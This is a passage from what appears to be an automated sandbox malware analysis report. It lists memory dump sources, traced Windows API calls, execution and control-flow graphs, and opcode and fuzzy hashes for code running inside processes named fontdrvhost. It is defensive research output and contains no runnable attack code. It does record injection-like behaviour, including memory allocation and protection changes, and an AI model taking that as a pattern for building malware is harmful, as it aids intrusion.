                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046A808
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                    • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                                    • Opcode ID: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction ID: 855bd9d759665368c18885314bfe8a93a87ca15081f3247de167772f86f515d8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00762af9e337a6805c8ac2cb9da72729d3ba67172526ae018d23e5fce0be16ff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24E06D742007118BD3B0AF65E408B46BAE4AB15704F00887FE481E3681EBB8E8448FAA

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 032802D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 03280326
                                                                                                                                                                                                                                                                      • Part of subcall function 032800A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032800CD
                                                                                                                                                                                                                                                                      • Part of subcall function 032800A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03280279
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 03280378
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032803E7
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03280407
                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0328042E
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03280456
                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 03280471
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001B.00000003.2676485971.0000000003280000.00000040.00000001.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_27_3_3280000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                    • Instruction ID: d73e6ecd365e29bd323859f6d79d0520a251ea2c327265b6bc68ba8eb7fa2544
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A612DB5911209FFDB20DFA5C884ADEFBB9FF08350F14C419E959A7281D770A994CB60
                                                                                                                                                                                                                                                                    Function 032800A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032800CD
                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03280279
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001B.00000003.2676485971.0000000003280000.00000040.00000001.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_27_3_3280000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction ID: e6015e8d9a322ba7934b8be86da784dfcedf7d350265ee64809fdd4b99bc1445
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB719F71E1524AEFDB41DF98C881BEDBBF0AF09314F288095E465F7281C274AA95CF64

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:33.4%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:83.3%
                                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                    execution_graph 415 160fb071cf4 417 160fb071d19 415->417 416 160fb071fa1 417->416 426 160fb0715c0 417->426 419 160fb071f98 CloseHandle 419->416 420 160fb071f88 NtAcceptConnectPort 420->419 421 160fb071e3a 421->419 421->420 423 160fb071ecd 421->423 429 160fb070ac8 421->429 423->423 435 160fb071aa4 NtAcceptConnectPort 423->435 428 160fb0715f4 NtAcceptConnectPort 426->428 428->421 430 160fb070c62 429->430 431 160fb070ae8 429->431 430->423 431->430 431->431 432 160fb070be8 NtAcceptConnectPort 431->432 432->430 433 160fb070c1b 432->433 433->430 434 160fb070c33 NtAcceptConnectPort 433->434 434->430 436 160fb071af7 435->436 437 160fb071c04 435->437 441 160fb071870 436->441 437->420 439 160fb071b10 440 160fb071bb6 NtAcceptConnectPort 439->440 440->437 442 160fb071889 441->442 443 160fb071930 GetProcessMitigationPolicy 442->443 444 160fb071949 442->444 443->444 444->439

                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00000160FB071CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                    • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                    • Instruction ID: 4ff749c0c8f5fc15df6ad5af22421ff6019a9b4eab0795ee1b58af0e24a9350d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9918530508E088FD775DB18C985BE6B3E1FB98310F24469ED49BC7296EB75AD428B81
                                                                                                                                                                                                                                                                    Function 00000160FB070AC8 Relevance: 3.2, APIs: 2, Instructions: 185nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                    • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                    • Instruction ID: 8bf32546ece7f4e08d54b8f274e8e97447e76c7525ba1535a3520b62e916a4d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86514530518E140BE33DA6388C952BAB7D1F789305F34029ED0F3C5093EF66DA468A86
                                                                                                                                                                                                                                                                    Function 00000160FB071AA4 Relevance: 3.2, APIs: 2, Instructions: 150nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2923266908-0
                                                                                                                                                                                                                                                                    • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                    • Instruction ID: 721aacd78976389b58a255a72da51e26e801d3c4d6c52cc63bc99b1030a6dc54
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7941EF30208B488FDB54EF2C8C897967B90EB59320F1443AEE85ACB2D7DB74D9498795
                                                                                                                                                                                                                                                                    Function 00000160FB0715C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 118 160fb0715c0-160fb0715f2 119 160fb0715f4-160fb0715f7 118->119 120 160fb0715f9-160fb0715fb 118->120 121 160fb07161f-160fb07166d NtAcceptConnectPort 119->121 122 160fb0715fd-160fb071609 120->122 123 160fb07160b-160fb07160d 120->123 122->121 124 160fb07160f-160fb07161b 123->124 125 160fb07161d 123->125 124->121 125->121
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000160FB071E3A), ref: 00000160FB071654
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                    • Instruction ID: bfd51c0100926e8d384ceef6b12853b2c0efdf822c75e9c5115293667a95a7e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0216371508B088FDB59DF18C9C9AAAF7E1FB68305F140A6EE44AC7260DB31E985CF41
                                                                                                                                                                                                                                                                    Function 00000160FB071870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 95 160fb071870-160fb0718a0 call 160fb0708a4 * 2 100 160fb0718a6-160fb0718a9 95->100 101 160fb071954-160fb07195b 95->101 100->101 102 160fb0718af-160fb0718b9 100->102 102->101 103 160fb0718bf-160fb0718c4 102->103 103->101 104 160fb0718ca-160fb0718d7 103->104 104->101 105 160fb0718d9-160fb0718e1 104->105 105->101 106 160fb0718e3-160fb0718ee 105->106 106->101 107 160fb0718f0-160fb0718f7 106->107 107->101 108 160fb0718f9-160fb0718fc 107->108 108->101 109 160fb0718fe-160fb071906 108->109 109->101 110 160fb071908-160fb07190b 109->110 110->101 111 160fb07190d-160fb071916 110->111 111->101 112 160fb071918-160fb07191c 111->112 112->101 113 160fb07191e-160fb07192e 112->113 113->101 115 160fb071930-160fb071947 GetProcessMitigationPolicy 113->115 115->101 116 160fb071949-160fb07194e 115->116 116->101 117 160fb071950-160fb071951 116->117 117->101
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                    • Instruction ID: cd3fa527d69eb593d5888881d0cb58f27211b197006b53ccc14dcfbc83f667ef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00318130200E074BEBB796688D947F2B2D2EB98310F3441E9C015D71D1EFA6ED5ACA40

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00000160FB070511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.2878088917.00000160FB070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000160FB070000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_160fb070000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                    • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F